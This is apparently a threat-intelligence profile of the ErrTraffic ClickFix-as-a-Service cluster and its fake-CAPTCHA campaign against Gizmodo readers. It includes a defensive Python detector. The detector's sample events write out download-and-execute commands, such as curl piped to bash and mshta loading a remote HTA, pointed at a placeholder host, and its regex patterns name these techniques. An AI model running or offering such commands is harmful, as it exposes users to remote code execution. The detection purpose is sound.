ErrTraffic
ErrTraffic is a cybercriminal threat cluster, and a service of the same name, that the reporting collected here describes as operating a ClickFix-as-a-Service model. Proofpoint-linked reporting attributed campaigns either to the ErrTraffic service itself or to an ErrTraffic affiliate. The service provides ready-made infrastructure for ClickFix attacks and lets customers deliver malware of their choice. ErrTraffic is also explicitly listed among the threat clusters outside the TA569 ecosystem that use web injects.

In the cited Gizmodo incident, activity attributed to an ErrTraffic affiliate used fake CAPTCHA (ClickFix) prompts delivered by a malicious script injected through a compromised website account. The prompts were tailored to the visitor's operating system and tried to trick users into manually running terminal or PowerShell commands. On Windows the campaign attempted to install NetSupport RAT; a separate macOS payload was prepared but appeared ineffective because it was packaged in a password-protected ZIP archive.

The reporting does not attribute ErrTraffic to any nation state and provides no aliases or sub-groups beyond the name ErrTraffic.
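The detection a SOC would want for the behaviour described above is a check on how the pasted command gets executed: a user-facing shell (explorer.exe for a Windows Run-dialog paste, a terminal shell on macOS) launching an interpreter with download-and-execute arguments. The following Python is an added example written for this page, not code from the reporting or from any vendor. The event layout, the parent and interpreter lists, and the sample events are constructed assumptions, and the indicators are generic ClickFix command-line traits rather than anything specific to ErrTraffic or the Gizmodo campaign.

```python
"""ClickFix-style launch detection over constructed process-creation events.

Added example for this page: the event schema, parent/interpreter lists and
sample events are assumptions, not data from the ErrTraffic reporting.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    os: str       # "windows" or "macos"
    parent: str   # parent process image name
    image: str    # child process image name
    cmdline: str  # child command line as recorded by the sensor


# Where a manually pasted command is typically executed from (assumption):
# the Windows desktop shell (Win+R / Run dialog) or a macOS terminal session.
USER_SHELL_PARENTS = {
    "windows": {"explorer.exe", "windowsterminal.exe"},
    "macos": {"terminal", "iterm2", "zsh", "bash", "sh"},
}

# Interpreters the pasted command ends up running in.
INTERPRETERS = {
    "windows": {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"},
    "macos": {"zsh", "bash", "sh", "curl", "osascript"},
}

# Generic download-and-execute traits of pasted ClickFix commands.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")),
    ("hidden_window",   re.compile(r"(?i)\s-(w|win|windowstyle)\s+hidden\b")),
    ("web_cradle",      re.compile(r"(?i)\b(iwr|invoke-webrequest|invoke-expression|iex|curl|wget)\b")),
    ("pipe_to_shell",   re.compile(r"(?i)\|\s*(sh|bash|zsh|iex)\b")),
    ("base64_decode",   re.compile(r"(?i)base64\s+(-d|--decode)\b|frombase64string")),
    ("mshta_remote",    re.compile(r"(?i)\bmshta(\.exe)?\s+https?://")),
]


def classify(ev: ProcEvent) -> list[str]:
    """Return the indicator names matched by ev, or [] if the launch does not
    fit the ClickFix shape (user shell -> interpreter with suspicious args)."""
    parents = USER_SHELL_PARENTS.get(ev.os)
    interps = INTERPRETERS.get(ev.os)
    if parents is None or interps is None:
        return []
    if ev.parent.lower() not in parents or ev.image.lower() not in interps:
        return []
    return [name for name, rx in INDICATORS if rx.search(ev.cmdline)]


def flag_clickfix(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Events that fit the ClickFix shape and match at least one indicator."""
    flagged = []
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev, hits))
    return flagged


# Constructed sample events (not observed data). URLs use the reserved
# .invalid TLD so they cannot resolve.
SAMPLE_EVENTS = [
    # Windows Run-dialog paste: hidden window plus encoded command.
    ProcEvent("windows", "explorer.exe", "powershell.exe",
              "powershell -w hidden -enc SQBFAFgA"),
    # Windows paste that hands a remote HTA to mshta.
    ProcEvent("windows", "explorer.exe", "mshta.exe",
              "mshta https://example.invalid/verify.hta"),
    # Benign interactive PowerShell: right shape, no indicator.
    ProcEvent("windows", "explorer.exe", "powershell.exe", "powershell Get-Date"),
    # macOS terminal paste: curl piped straight into a shell.
    ProcEvent("macos", "Terminal", "zsh",
              "zsh -c 'curl -fsSL https://example.invalid/fix.sh | bash'"),
    # Encoded PowerShell from a service: suspicious, but not a user paste.
    ProcEvent("windows", "services.exe", "powershell.exe",
              "powershell -enc SQBFAFgA"),
]

if __name__ == "__main__":
    for ev, hits in flag_clickfix(SAMPLE_EVENTS):
        print(f"{ev.os:8} {ev.parent} -> {ev.image}: {', '.join(hits)}")
```

The parent-process constraint is what separates a pasted command from the same PowerShell arguments launched by a scheduled task or service, which is why the last sample event is deliberately not flagged. In real telemetry the macOS pipeline appears as separate curl and bash processes rather than one command line, so the shell's own command record (or the sensor's script-execution event) is the field to match. On Windows, the Run dialog also leaves the pasted text under the RunMRU key in the user's registry hive, which is a useful corroborating artifact during triage.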
Tradecraft
2 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
1 malware family attributed to this actor across reporting.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
Likely operated the ClickFix campaign against Gizmodo readers, providing ClickFix-as-a-Service infrastructure to distribute malware via fake CAPTCHA prompts.
A ClickFix-as-a-service operation whose affiliates deliver malware via fake CAPTCHA-style prompts that trick users into executing malicious commands.
Threat cluster identified as using web inject campaigns beyond the TA569 ecosystem.
Threat cluster involved in web-inject campaigns using compromised websites and fake-update-style delivery.